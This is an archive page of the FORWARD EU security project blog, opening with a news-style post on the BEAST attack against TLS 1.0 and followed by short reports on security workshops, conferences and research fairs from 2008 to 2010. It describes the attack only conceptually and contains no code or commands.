Warning: Creating default object from empty value in /home/ict-forward/www-apps/wp-svn/wp-includes/ms-load.php on line 138
forward « The FORWARD project blog

Archive for the ‘forward’ Category

a «BEAST» exploiting the (almost) secure web, SSL.

Tuesday, January 10th, 2012

Researchers have discovered a serious weakness in virtually all websites protected by the secure sockets layer protocol that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser.

The vulnerability resides in versions 1.0 and earlier of TLS, or transport layer security, the successor to the secure sockets layer technology that serves as the internet’s foundation of trust. Although versions 1.1 and 1.2 of TLS aren’t susceptible, they remain almost entirely unsupported in browsers and websites alike, making encrypted transactions on PayPal, GMail, and just about every other website vulnerable to eavesdropping by hackers who are able to control the connection between the end user and the website he’s visiting.

At the Ekoparty security conference in Buenos Aires later this week, researchers Thai Duong and Juliano Rizzo plan to demonstrate proof-of-concept code called BEAST, which is short for Browser Exploit Against SSL/TLS. The stealthy piece of JavaScript works with a network sniffer to decrypt encrypted cookies a targeted website uses to grant access to restricted user accounts. The exploit works even against sites that use HSTS, or HTTP Strict Transport Security, which prevents certain pages from loading unless they’re protected by SSL.

The demo will decrypt an authentication cookie used to access a PayPal account, Duong said.

By contrast, Duong and Rizzo say they’ve figured out a way to defeat SSL by breaking the underlying encryption it uses to prevent sensitive data from being read by people eavesdropping on an address protected by the HTTPs prefix.

“BEAST is different than most published attacks against HTTPS,” Duong wrote in an email. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”

Instead, BEAST carries out what’s known as a plaintext-recovery attack that exploits a vulnerability in TLS that has long been regarded as mainly a theoretical weakness. During the encryption process, the protocol scrambles block after block of data using the previous encrypted block. It has long been theorized that attackers can manipulate the process to make educated guesses about the contents of the plaintext blocks.

If the attacker’s guess is correct, the block cipher will receive the same input for a new block as for an old block, producing an identical ciphertext.

At the moment, BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies of 1,000 to 2,000 characters long will still take a minimum of a half hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of Duong and Rizzo’s claim that this time can be drastically shortened.

In an email sent shortly after this article was published, Rizzo said refinements made over the past few days have reduced the time required to under 10 minutes.

“BEAST is like a cryptographic Trojan horse – an attacker slips a bit of JavaScript into your browser, and the JavaScript collaborates with a network sniffer to undermine your HTTPS connection,” Trevor Perrin, an independent security researcher, wrote in an email. “If the attack works as quickly and widely as they claim it’s a legitimate threat.”




Mozilla extends plug-in detection page to all major browsers

Tuesday, May 18th, 2010

The Mozilla Firefox development team has recently came with the idea of warning Firefox users about outdated, insecure or buggy plug-in. It was first implemented for Adobe flash plug in. It was created as a What’s New page and integrated in recent Firefox updates.

The scripts on the page check for installed plugins and compare the version of the installed plugin with the latest version that is offered officially by the developer of the plugin. Some supported plug-ins (among others) are Apple Quicktime, Shockwave Flash, Adobe Acrobat, Java, RealPlayer and Windows Media Player plugins. Furthermore the Mozila Firefox development team now extends the page to support all the popular browsers.


FORWARD at the ICT Days 2009 in Sofia

Thursday, November 5th, 2009

From 28th to 31st of October 2009 at Inter Expo Center – Sofia, Bulgaria, the Days of Information and Communication Technologies 2009 were held. The event combined specialised exhibition ICT Expo and an interesting seminar program.
ICT Expo offers a platform for comparing the current industrial trends and product presentations. The aim of ICT Expo is to acquaint visitors with the latest innovations in all fields of information and communication technologies – server solutions, PC assembly components, personal and mobile computers, peripherals and network solutions, card technology, business process management, learning & knowledge solutions, telecommunication equipment, financial solutions, multimedia products, business management software and information safety, innovations from Bulgarian software developers.
The seminar programme included a forum where the business representatives had the opportunity to get acquainted with the new state administration, to discuss the state of the branch in crisis conditions.

As part of the seminar programme the FP7 EU project FORWARD was presented along with another EU funded project PSIRP. In a half-hour presentation Edita Djambazova from IPP-BAS described FORWARD’s goal, objectives, and results. Some of the emerging security threats identified during the project were discussed. The established security community around ICT-FORWARD was outlined as one of its important achievements.

2nd FORWARD Workshop sum-up

Friday, June 12th, 2009

On May 4th and 5th of 2009, the FORWARD consortium organized the 2nd workshop of the project. The workshop took place in Hotel Delcloy in Côte d’Azur. The agenda focused on the progress of the FORWARD working groups (WGs) having both summary presentations of their work and focused panel discussions for each WG. The keynotes and presentations helped to spark discussions during the panel sessions that were also carried on during the scheduled breaks.


The ICT Fair for Trust & Security Research: Aftermath

Tuesday, June 2nd, 2009

The ICT Fair for Trust and Security Research was organized by the Olomouc Region under the Czech Presidency of the EU and in collaboration with the EC. Its goal was to give practical information on the FP7 research opportunities and foster the partcipation in the forthcoming call for proposals. The vice-president of the Olomouc Region Mr. Michael Fisher opened the Fair and presented region’s experience in the collaboration with the EC in ICT. The vice-rector of the Palacky University in Olomouc Mr. Michal Malacka talked about University’s participation in European projects on information security.

The Head of Unit “Trust & Security” in DG INFSO of the European Commission Mr. Jacques Bus presented the ICT priorities in the Seventh Framework Program. He outlined that the main goals of the objective “Trustworthy ICT” is the building of Trustworthy Network Infrastructures and Trustworthy Service Infrastructures which are the way to develop the Future Internet as a conglomerate of heterogeneous networks and systems. The infrastructures of secure and trustworthy networks have to make the Future Internet more secure, to allow for monitoring and managing the security threats, to build secure infrastructures and virtual objects. It is important to make experiments, to pay attention to the societal impact and to the interaction between the technologies and the users. Mr. Bus announced the indicative opening date of the next Call for proposals is 31st July 2009 and the submission deadline is 3rd November 2009.


ICT Fair for Trust & Security Research

Thursday, April 30th, 2009

The ICT Fair for Trust & Security Research will be held in Olomouc, the Czech Republic, on 14 May 2009. The ICT Fair is an event promoted by the Olomouc Region, the Czech Republic, in cooperation with the European Commission and is associated with the official program of the Semester of the Czech Presidency to the EU Council. The Fair is a unique opportunity for getting practical hands-on information and concrete advice on how to become involved in EU’s FP7 research activities.


FORWARD future threats panel at EC2ND 2008

Tuesday, January 20th, 2009

The European Conference on Computer Network Defense (EC2ND) is an annual conference bringing together academia and industry to discuss topics in network and systems security. This year it was held at Dublin City University in Dublin, Ireland. The programme included a panel organised by FORWARD, where possible future threats on global ICT infrastructure were discussed. The panel constituted of members from all FORWARD working groups (WGs), and was headed by Sotiris Ioannidis.


The Future of Network Resiliency in Europe

Saturday, December 20th, 2008

Communication networks are used every day by millions of European citizens to conduct business, communicate with their friends and family, get the latest news, etc. For this reason, network resiliency is of paramount importance to the European Union. The term resiliency is overloaded, but in this context we use it to mean networks that provide and maintain an acceptable level of service in face of faults (natural disasters, human error, or intentional malicious actions) affecting their normal operation.

The European Network and Information Security Agency (ENISA) held a workshop on “Improving Resilience in European e-Communication Networks” on the 12-13 of November 2008 in Brussels. Sotiris Ioannidis participated in the workshop and gave a talk on the Resilience improving features of MPLS, IPv6 and DNSSEC.

FORWARD at the 2nd EU-Korea Cooperation Forum on ICT Research

Sunday, December 7th, 2008

The relations between the European Union (EU) and the Republic of South Korea are founded on increasingly shared political values, strong economic links reflecting larger and larger bilateral trade and investment flows, and the EU’s reiterated support for South Korea’s policy of engagement with the North.

In 1995, the EU decided to negotiate a “Framework Agreement on Trade and Cooperation“, in recognition of South Korea’s increasing role in the Asian and global economy, and of its success in consolidating democracy. This Agreement entered into force in April 2001 and is implemented through an annual meeting of a Joint Committee.


Threats at the ENISA-FORTH Summer School on Network and Information Security

Monday, October 6th, 2008

The first ENISA-FORTH Summer School on Network and Information Security was held in Crete, Greece between the 15th and the 19th of September. This year’s topic was “Network Security,” and brought together experts in Information Security, policy members from EU Member States and EU Institutions, decision makers from the industry as well as members of the research and academic community. The lectures covered the whole spectrum of Network Security, including financial, political, legal, and technological issues. The detail of the talks varied from highly technical to high-level, to cater to different kinds of participants. In total there were about one hundred participants, including members of the press, mostly from Europe, but also from the United States, the Middle East, and Asia.